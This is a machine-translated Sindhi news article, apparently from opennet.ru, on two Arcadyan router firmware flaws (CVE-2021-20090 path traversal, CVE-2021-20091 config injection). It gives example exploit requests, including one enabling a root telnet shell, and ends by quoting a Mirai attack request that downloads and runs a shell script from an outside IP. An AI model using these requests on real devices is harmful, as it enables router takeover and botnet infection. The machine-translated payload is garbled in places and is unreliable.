17 ٺاهيندڙن کي متاثر ڪندڙ گهر جي رستن ۾ ڪمزور

گهر جي رستن جي خلاف نيٽ ورڪ تي هڪ وڏو حملو رڪارڊ ڪيو ويو آهي جن جي فرم ويئر آرڪيڊين ڪمپني کان HTTP سرور تي عمل درآمد ڪندي آهي. ڊوائيسز تي ڪنٽرول حاصل ڪرڻ لاء، ٻن خطرن جو هڪ ميلاپ استعمال ڪيو ويو آهي جيڪو روٽ حقن سان صوابديدي ڪوڊ جي ريموٽ عملدرآمد جي اجازت ڏئي ٿو. مسئلو Arcadyan، ASUS ۽ Buffalo کان ADSL راؤٽرز جي ڪافي وسيع رينج کي متاثر ڪري ٿو، ۽ گڏوگڏ بي لائن برانڊز (مسئلو سمارٽ باڪس فليش ۾ تصديق ٿيل آهي)، Deutsche Telekom، Orange، O2، Telus، Verizon، Vodafone ۽ ٻيا ٽيليڪ آپريٽرز. اهو نوٽ ڪيو ويو آهي ته مسئلو 10 سالن کان وڌيڪ عرصي تائين Arcadyan firmware ۾ موجود آهي ۽ هن وقت تائين 20 مختلف ٺاهيندڙن کان گهٽ ۾ گهٽ 17 ڊوائيس ماڊلز ڏانهن لڏپلاڻ ڪرڻ جو انتظام ڪيو ويو آهي.

پهريون نقصان، CVE-2021-20090، اهو ممڪن بڻائي ٿو ته ڪنهن به ويب انٽرفيس اسڪرپٽ تائين رسائي بغير تصديق جي. خساري جو خلاصو اهو آهي ته ويب انٽرفيس ۾، ڪجهه ڊائريڪٽريون جن ذريعي تصويرون، سي ايس ايس فائلون ۽ جاوا اسڪرپٽ اسڪرپٽ موڪليا ويا آهن، بغير تصديق جي رسائي لائق آهن. انهي صورت ۾، ڊائريڪٽريون جن لاءِ بغير تصديق جي رسائي جي اجازت آهي ابتدائي ماسڪ استعمال ڪندي چيڪ ڪيو وڃي ٿو. پيرن ڊاريڪٽري ڏانهن وڃڻ لاءِ رستن ۾ ”../“ اکرن جي وضاحت ڪرڻ فرم ویئر طرفان بلاڪ ڪيو ويو آهي، پر استعمال ڪندي "..%2f" ميلاپ کي ڇڏي ڏنو ويو آهي. اهڙيء طرح، اهو ممڪن آهي ته محفوظ صفحا کولڻ لاء جڏهن درخواستون موڪلڻ وانگر "http://192.168.1.1/images/..%2findex.htm".

ٻيو نقصان، CVE-2021-20091، هڪ تصديق ٿيل استعمال ڪندڙ کي اجازت ڏئي ٿو ته ڊيوائس جي سسٽم سيٽنگن ۾ تبديليون ڪري، خاص طور تي فارميٽ ٿيل پيرا ميٽرس کي موڪليندي apply_abstract.cgi اسڪرپٽ، جيڪو پيٽرول ۾ نئين لائن جي ڪردار جي موجودگي جي جانچ نٿو ڪري. . مثال طور، جڏهن هڪ پنگ آپريشن ڪري رهيو آهي، هڪ حملو ڪندڙ "192.168.1.2%0AARC_SYS_TelnetdEnable=1" جي قيمت بيان ڪري سگهي ٿو فيلڊ ۾ IP پتي سان چيڪ ڪيو پيو وڃي، ۽ اسڪرپٽ، جڏهن سيٽنگون فائل ٺاهيندي /tmp/etc/config/ .glbcfg، لکندو "AARC_SYS_TelnetdEnable=1" ان ۾ "، جيڪو telnetd سرور کي چالو ڪري ٿو، جيڪو روٽ حقن سان غير محدود ڪمانڊ شيل رسائي فراهم ڪري ٿو. اهڙي طرح، AARC_SYS پيٽرول کي ترتيب ڏيڻ سان، توهان سسٽم تي ڪنهن به ڪوڊ تي عمل ڪري سگهو ٿا. پهرين ڪمزوري ان کي "/images/..%2fapply_abstract.cgi" جي طور تي رسائي حاصل ڪرڻ سان بغير تصديق جي هڪ مشڪلاتي اسڪرپٽ کي هلائڻ ممڪن بڻائي ٿي.

ڪمزورين کي استحصال ڪرڻ لاء، هڪ حملي ڪندڙ کي نيٽ ورڪ پورٽ ڏانهن درخواست موڪلڻ جي قابل هوندو جنهن تي ويب انٽرفيس هلائي رهيو آهي. حملي جي پکيڙ جي متحرڪ جي لحاظ کان، ڪيترائي آپريٽرز انهن جي ڊوائيس تائين رسائي ڇڏيندا آهن ٻاهرين نيٽ ورڪ کان سپورٽ سروس جي مسئلن جي تشخيص کي آسان ڪرڻ لاء. جيڪڏهن انٽرفيس تائين رسائي صرف اندروني نيٽ ورڪ تائين محدود آهي، هڪ حملي کي "DNS ريبائنڊنگ" ٽيڪنڪ استعمال ڪندي ٻاهرين نيٽ ورڪ کان وٺي سگهجي ٿو. روٽرز کي Mirai botnet سان ڳنڍڻ لاءِ اڳ ۾ ئي خطرا استعمال ڪيا پيا وڃن: POST /images/..%2fapply_abstract.cgi HTTP/1.1 ڪنيڪشن: بند ڪريو يوزر-ايجنٽ: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_address212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh ; curl+-O+http://777/lolol.sh؛ chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

جو ذريعو: opennet.ru

تبصرو شامل ڪريو